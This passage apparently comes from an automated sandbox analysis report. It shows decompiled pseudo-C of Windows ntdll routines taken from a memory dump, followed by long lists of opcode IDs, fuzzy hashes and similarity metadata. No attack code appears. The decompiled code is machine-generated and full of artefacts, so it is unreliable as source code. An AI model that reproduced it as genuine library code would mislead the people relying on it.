                                                                              								continue;
                                                                              							}
                                                                              							L15:
                                                                              							if(_t64 == 0x102) {
                                                                              								break;
                                                                              							}
                                                                              							_t89 = _v24;
                                                                              							if(_t64 < 0) {
                                                                              								L0178DF30(_t93, _t97, _t64);
                                                                              								_push(_t93);
                                                                              								_t98 = _t97 | 0xffffffff;
                                                                              								__eflags =  *0x1826901;
                                                                              								_push(_t109);
                                                                              								_v52 = _t98;
                                                                              								if( *0x1826901 != 0) {
                                                                              									_push(0);
                                                                              									_push(1);
                                                                              									_push(0);
                                                                              									_push(0x100003);
                                                                              									_push( &_v12);
                                                                              									_t72 = E01779980();
                                                                              									__eflags = _t72;
                                                                              									if(_t72 < 0) {
                                                                              										_v12 = _t98 | 0xffffffff;
                                                                              									}
                                                                              								}
                                                                              								asm("lock cmpxchg [ecx], edx");
                                                                              								_t111 = 0;
                                                                              								__eflags = 0;
                                                                              								if(0 != 0) {
                                                                              									__eflags = _v12 - 0xffffffff;
                                                                              									if(_v12 != 0xffffffff) {
                                                                              										_push(_v12);
                                                                              										E017795D0();
                                                                              									}
                                                                              								} else {
                                                                              									_t111 = _v12;
                                                                              								}
                                                                              								return _t111;
                                                                              							} else {
                                                                              								if(_t89 != 0) {
                                                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                              									_t77 = E01757D50();
                                                                              									__eflags = _t77;
                                                                              									if(_t77 == 0) {
                                                                              										_t64 = 0x7ffe0384;
                                                                              									} else {
                                                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                              									}
                                                                              									__eflags =  *_t64;
                                                                              									if( *_t64 != 0) {
                                                                              										_t64 =  *[fs:0x30];
                                                                              										__eflags = _t64[0x240] & 0x00000004;
                                                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                                                              											_t78 = E01757D50();
                                                                              											__eflags = _t78;
                                                                              											if(_t78 == 0) {
                                                                              												_t64 = 0x7ffe0385;
                                                                              											} else {
                                                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                              											}
                                                                              											__eflags =  *_t64 & 0x00000020;
                                                                              											if(( *_t64 & 0x00000020) != 0) {
                                                                              												_t64 = E017B7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                              											}
                                                                              										}
                                                                              									}
                                                                              								}
                                                                              								return _t64;
                                                                              							}
                                                                              						}
                                                                              						_t97 = _t88;
                                                                              						_t93 = _t109;
                                                                              						E017CFDDA(_t97, _v12);
                                                                              						_t105 =  *_t109;
                                                                              						_t67 = _v12 + 1;
                                                                              						_v12 = _t67;
                                                                              						__eflags = _t105 - 0xffffffff;
                                                                              						if(_t105 == 0xffffffff) {
                                                                              							_t106 = 0;
                                                                              							__eflags = 0;
                                                                              						} else {
                                                                              							_t106 =  *(_t105 + 0x14);
                                                                              						}
                                                                              						__eflags = _t67 - 2;
                                                                              						if(_t67 > 2) {
                                                                              							__eflags = _t109 - 0x1825350;
                                                                              							if(_t109 != 0x1825350) {
                                                                              								__eflags = _t106 - _v20;
                                                                              								if(__eflags == 0) {
                                                                              									_t93 = _t109;
                                                                              									E017CFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						_push("RTL: Re-Waiting\n");
                                                                              						_push(0);
                                                                              						_push(0x65);
                                                                              						_v20 = _t106;
                                                                              						E017C5720();
                                                                              						_t104 = _v28;
                                                                              						_t116 = _t116 + 0xc;
                                                                              						continue;
                                                                              					}
                                                                              				}
                                                                              			}

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Re-Waiting
                                                                              • API String ID: 0-316354757
                                                                              • Opcode ID: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                              • Instruction ID: f1a45e618574e515110a7a0a676e0abaedd83a8259b47e69e37236aa2cf261e3
                                                                              • Opcode Fuzzy Hash: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                              • Instruction Fuzzy Hash: DC614931A80605AFDB32EF6CC848B7EFBA5EB89720F140299D911972C3C7749A40C792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 80%
                                                                              			E01800EA5(void* __ecx, void* __edx) {
                                                                              				signed int _v20;
                                                                              				char _v24;
                                                                              				intOrPtr _v28;
                                                                              				unsigned int _v32;
                                                                              				signed int _v36;
                                                                              				intOrPtr _v40;
                                                                              				char _v44;
                                                                              				intOrPtr _v64;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				signed int _t58;
                                                                              				unsigned int _t60;
                                                                              				intOrPtr _t62;
                                                                              				char* _t67;
                                                                              				char* _t69;
                                                                              				void* _t80;
                                                                              				void* _t83;
                                                                              				intOrPtr _t93;
                                                                              				intOrPtr _t115;
                                                                              				char _t117;
                                                                              				void* _t120;
                                                                              
                                                                              				_t83 = __edx;
                                                                              				_t117 = 0;
                                                                              				_t120 = __ecx;
                                                                              				_v44 = 0;
                                                                              				if(E017FFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                              					L24:
                                                                              					_t109 = _v44;
                                                                              					if(_v44 != 0) {
                                                                              						E01801074(_t83, _t120, _t109, _t117, _t117);
                                                                              					}
                                                                              					L26:
                                                                              					return _t117;
                                                                              				}
                                                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                              				_t5 = _t83 + 1; // 0x1
                                                                              				_v36 = _t5 << 0xc;
                                                                              				_v40 = _t93;
                                                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                              				asm("sbb ebx, ebx");
                                                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                              				if(_t58 != 0) {
                                                                              					_push(0);
                                                                              					_push(0x14);
                                                                              					_push( &_v24);
                                                                              					_push(3);
                                                                              					_push(_t93);
                                                                              					_push(0xffffffff);
                                                                              					_t80 = E01779730();
                                                                              					_t115 = _v64;
                                                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                              						_push(_t93);
                                                                              						E017FA80D(_t115, 1, _v20, _t117);
                                                                              						_t83 = 4;
                                                                              					}
                                                                              				}
                                                                              				if(E017FA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                              					goto L24;
                                                                              				}
                                                                              				_t60 = _v32;
                                                                              				_t97 = (_t60 != 0x100000) + 1;
                                                                              				_t83 = (_v44 -  *0x1828b04 >> 0x14) + (_v44 -  *0x1828b04 >> 0x14);
                                                                              				_v28 = (_t60 != 0x100000) + 1;
                                                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                              				_v40 = _t62;
                                                                              				if(_t83 >= _t62) {
                                                                              					L10:
                                                                              					asm("lock xadd [eax], ecx");
                                                                              					asm("lock xadd [eax], ecx");
                                                                              					if(E01757D50() == 0) {
                                                                              						_t67 = 0x7ffe0380;
                                                                              					} else {
                                                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                              					}
                                                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                              						E017F138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                              					}
                                                                              					if(E01757D50() == 0) {
                                                                              						_t69 = 0x7ffe0388;
                                                                              					} else {
                                                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                              					}
                                                                              					if( *_t69 != 0) {
                                                                              						E017EFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                              					}
                                                                              					if(( *0x1828724 & 0x00000008) != 0) {
                                                                              						E017F52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                              					}
                                                                              					_t117 = _v44;
                                                                              					goto L26;
                                                                              				}
                                                                              				while(E018015B5(0x1828ae4, _t83, _t97, _t97) >= 0) {
                                                                              					_t97 = _v28;
                                                                              					_t83 = _t83 + 2;
                                                                              					if(_t83 < _v40) {
                                                                              						continue;
                                                                              					}
                                                                              					goto L10;
                                                                              				}
                                                                              				goto L24;
                                                                              			}

























                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `
                                                                              • API String ID: 0-2679148245
                                                                              • Opcode ID: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                              • Instruction ID: 3fade79c59492b8636afd0b81d25e857c77243cb288bcffcbf46c6478ca2c107
                                                                              • Opcode Fuzzy Hash: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                              • Instruction Fuzzy Hash: 4A51AE713043469FD766DF18D888B1BBBE5EB84754F04092CFA86C72D1D670EA05C762
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 75%
                                                                              			E0176F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                              				intOrPtr _v8;
                                                                              				intOrPtr _v12;
                                                                              				intOrPtr _v16;
                                                                              				char* _v20;
                                                                              				intOrPtr _v24;
                                                                              				char _v28;
                                                                              				intOrPtr _v32;
                                                                              				char _v36;
                                                                              				char _v44;
                                                                              				char _v52;
                                                                              				intOrPtr _v56;
                                                                              				char _v60;
                                                                              				intOrPtr _v72;
                                                                              				void* _t51;
                                                                              				void* _t58;
                                                                              				signed short _t82;
                                                                              				short _t84;
                                                                              				signed int _t91;
                                                                              				signed int _t100;
                                                                              				signed short* _t103;
                                                                              				void* _t108;
                                                                              				intOrPtr* _t109;
                                                                              
                                                                              				_t103 = __ecx;
                                                                              				_t82 = __edx;
                                                                              				_t51 = E01754120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                              				if(_t51 >= 0) {
                                                                              					_push(0x21);
                                                                              					_push(3);
                                                                              					_v56 =  *0x7ffe02dc;
                                                                              					_v20 =  &_v52;
                                                                              					_push( &_v44);
                                                                              					_v28 = 0x18;
                                                                              					_push( &_v28);
                                                                              					_push(0x100020);
                                                                              					_v24 = 0;
                                                                              					_push( &_v60);
                                                                              					_v16 = 0x40;
                                                                              					_v12 = 0;
                                                                              					_v8 = 0;
                                                                              					_t58 = E01779830();
                                                                              					_t87 =  *[fs:0x30];
                                                                              					_t108 = _t58;
                                                                              					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                              					if(_t108 < 0) {
                                                                              						L11:
                                                                              						_t51 = _t108;
                                                                              					} else {
                                                                              						_push(4);
                                                                              						_push(8);
                                                                              						_push( &_v36);
                                                                              						_push( &_v44);
                                                                              						_push(_v60);
                                                                              						_t108 = E01779990();
                                                                              						if(_t108 < 0) {
                                                                              							L10:
                                                                              							_push(_v60);
                                                                              							E017795D0();
                                                                              							goto L11;
                                                                              						} else {
                                                                              							_t109 = L01754620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                              							if(_t109 == 0) {
                                                                              								_t108 = 0xc0000017;
                                                                              								goto L10;
                                                                              							} else {
                                                                              								_t21 = _t109 + 0x18; // 0x18
                                                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                              								 *_t109 = 1;
                                                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                              								 *(_t109 + 0xe) = _t82;
                                                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                              								E0177F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                              								_t91 =  *_t103 & 0x0000ffff;
                                                                              								_t100 = _t91 & 0xfffffffe;
                                                                              								_t84 = 0x5c;
                                                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                              										_push(_v60);
                                                                              										E017795D0();
                                                                              										L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                              										_t51 = 0xc0000106;
                                                                              									} else {
                                                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                              										goto L5;
                                                                              									}
                                                                              								} else {
                                                                              									L5:
                                                                              									 *_a4 = _t109;
                                                                              									_t51 = 0;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              				}
                                                                              				return _t51;
                                                                              			}


























                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `
                                                                              • API String ID: 0-2679148245
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: WindowsExcludedProcs
                                                                              • API String ID: 0-3583428290
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx
                                                                              • API String ID: 0-89312691
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • Critical error detected %lx, xrefs: 017E8E21
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Critical error detected %lx
                                                                              • API String ID: 0-802127002
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017CFF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                              • API String ID: 0-1911121157
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              • Opcode Fuzzy Hash: ff8df3b1c7ed6c4a5a194d9d7c6769558c5402c25e5cf2f379914819d7d9e9c5
                                                                              • Instruction Fuzzy Hash: C141D3B17002119BD7268A29C894F3BFBD9AF98720F04821DFB1E8B3D4DB34D941C691
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c1e76ae0c6b538662a51c756ea9b6e15b28f6ec4d2d98f4a9cc8730692b8a60
                                                                              • Instruction ID: 7660e02286233838ef0ebdf3dd40399433d16a115ed8f70426610fbd1039d7bb
                                                                              • Opcode Fuzzy Hash: 7c1e76ae0c6b538662a51c756ea9b6e15b28f6ec4d2d98f4a9cc8730692b8a60
                                                                              • Instruction Fuzzy Hash: 7F51B271E01616CFCB65CFACC490AAEFBF1BF49310F20815AD955A7345DBB1A984CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                              • Instruction ID: 1a8510cca2bf8a2ab48274e470d018bc218dfed964bee88d053a52196acf372b
                                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                              • Instruction Fuzzy Hash: 06512230E04249DFEB21CB6CC1C4BAEFBF1BF85324F1881A8C54593292C779A989C791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                              • Instruction ID: af2d3c69aa5cf9aa9b08d72b30c349577dddc97ff7b118bbe4786bb68734705b
                                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                              • Instruction Fuzzy Hash: EA51A07150064ADFDB56CF18C880A95FBB5FF45304F15C1AAE908DF256E372EA45CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b77e400ca20ad3e20600982faa6dc12865f4bebe5785c4d0b364edde470de11
                                                                              • Instruction ID: 51d2877feb6ca23401bac5daeb532e40f20dfbfbfd836ebca09ec84abee1fa0c
                                                                              • Opcode Fuzzy Hash: 2b77e400ca20ad3e20600982faa6dc12865f4bebe5785c4d0b364edde470de11
                                                                              • Instruction Fuzzy Hash: 1B516A71A0020AEFDF65DF59C880AEEFBB9BF48310F108155ED00AB266C7759A52CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c343729f18a3003ab6e983762913a9167ebca7e80579680d1e0feb20dc6520d5
                                                                              • Instruction ID: 2ca36d23e53a1df0dd5943df778d1a7e8a126a339fbe133da73379d572425571
                                                                              • Opcode Fuzzy Hash: c343729f18a3003ab6e983762913a9167ebca7e80579680d1e0feb20dc6520d5
                                                                              • Instruction Fuzzy Hash: 0941B235A00229DBDB21DF68C944BEAFBB8EF45700F4501A5E909AB345EB749E84CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 798f1485d3ee0a797480722358a8cc62b94093c3917d675ab824b3e5d167f618
                                                                              • Instruction ID: 1b660831490b774b0948c37ac53c1e46078e7198dfb27ddbd0a60a3fad175be5
                                                                              • Opcode Fuzzy Hash: 798f1485d3ee0a797480722358a8cc62b94093c3917d675ab824b3e5d167f618
                                                                              • Instruction Fuzzy Hash: 2641F871A403189FEB32DF18CC84FA6F7A9EB55710F04409AED4697285D774ED84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                              • Instruction ID: b0e7d171f9157fc153e5fc67c44f0313cfc4daa949e3ef2af1508dba80a27be2
                                                                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                              • Instruction Fuzzy Hash: B231D332F002496BEB158B69C845FAFFBBBEF84210F05846DEA09A7351DA74DD44C750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b027f1d00320c889c2c86aa18205a6c47e9a57b65d41b59b77cf98e22793412e
                                                                              • Instruction ID: e09062b8645d664fc3b05e996673024dbf182de71fb5d1919ea2c64d4999c95e
                                                                              • Opcode Fuzzy Hash: b027f1d00320c889c2c86aa18205a6c47e9a57b65d41b59b77cf98e22793412e
                                                                              • Instruction Fuzzy Hash: 7A4170B4A0022D9FDB24DF99CC88AA9F7F8FB54300F1046EAD91997242E7709E80CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                              • Instruction ID: 1e4b77e95e613414a1653ca5e617dc3ca8e89f98cbf01deaea9c4de8deeb541c
                                                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                              • Instruction Fuzzy Hash: 7631D333204645AFD7269B6CC848F6BFBE9EF89750F18415CEA468B346DE74D841C750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                              • Instruction ID: 34d0417bd19d0079c26c9e1e6528c18244dba42cbb8a63518a913eebc18381e4
                                                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                              • Instruction Fuzzy Hash: 7B31D2326047069BC719DF28C884E6BF7EAFBC4210F05492DFA5687755DE30E909CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1523628c998715027ffc34d7124924b1869a9d001b13757eb3aa6bd2602e0cf
                                                                              • Instruction ID: 57acb825b6da0dc21b378832ded884addba32556681e4942bfbd778a667fcb54
                                                                              • Opcode Fuzzy Hash: b1523628c998715027ffc34d7124924b1869a9d001b13757eb3aa6bd2602e0cf
                                                                              • Instruction Fuzzy Hash: 8A418DB1D01209AFDB21DFA9D980BFEFBF4EF48714F14812AEA14A3244DB709A05CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b7520e0195ab3b3cb73db225e8482c19a13039b6edee7626465f27a1c0dd69c
                                                                              • Instruction ID: f4e1eb98b661c8a55ffa1e231b8c62733ec5bdc81b81d2d9882f32a0c4ee112b
                                                                              • Opcode Fuzzy Hash: 2b7520e0195ab3b3cb73db225e8482c19a13039b6edee7626465f27a1c0dd69c
                                                                              • Instruction Fuzzy Hash: 81315931255611EBCB229B1CD884F2AFB79FF60730F114629F9154B296DB70E940C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5010fd11e4fe6699d891864db84aed8a24a7d045b1c2e86de8563ff3c0077a6
                                                                              • Instruction ID: 5225794f4040d58309c3e3c93d5f50415844d547ca328ce8a2d0fc1de0835e0d
                                                                              • Opcode Fuzzy Hash: d5010fd11e4fe6699d891864db84aed8a24a7d045b1c2e86de8563ff3c0077a6
                                                                              • Instruction Fuzzy Hash: 9C31BE71604615DBDB298F2DC841A7AFBE5FF99700B0584AEE946CB350EB70D880E791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7a62584aa6046458575ba945563517a0c076febf135f573cdff5bd8dd7e60042
                                                                              • Instruction ID: e04141f36b74e1dc3670d77b11bbe61c65362a4a2e9fc5675656b0758c35187b
                                                                              • Opcode Fuzzy Hash: 7a62584aa6046458575ba945563517a0c076febf135f573cdff5bd8dd7e60042
                                                                              • Instruction Fuzzy Hash: C04168B5A01205DFCB15CF58C890B99FBF5BB99304F1881A9EA05AB344C778AA41CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                              • Instruction ID: dbf3fd7bb83d02b978e90bf3e34c2f2af793a2a09c9c9715a40ceff12a0a163e
                                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                              • Instruction Fuzzy Hash: EC316B71A05687BFD746EBB8C480BF9FB58BF52244F04415AC91C87206DBB45A45C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38003e245f505ed38eff2331ad504117a1bca47e0590878abe170962b584091b
                                                                              • Instruction ID: 81a11f45afb8e7e164595554f64a5354dff6debeef0156a9f71f7d9f6bae4c77
                                                                              • Opcode Fuzzy Hash: 38003e245f505ed38eff2331ad504117a1bca47e0590878abe170962b584091b
                                                                              • Instruction Fuzzy Hash: D531B1726047559BC324DF28C884BAAF7E9FFC8700F044A29F99587694E730E904CBA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e74b40b6b90d978055d25d0f2c3d896b05d5e5d75fa6fa491c836c5d9fe7616e
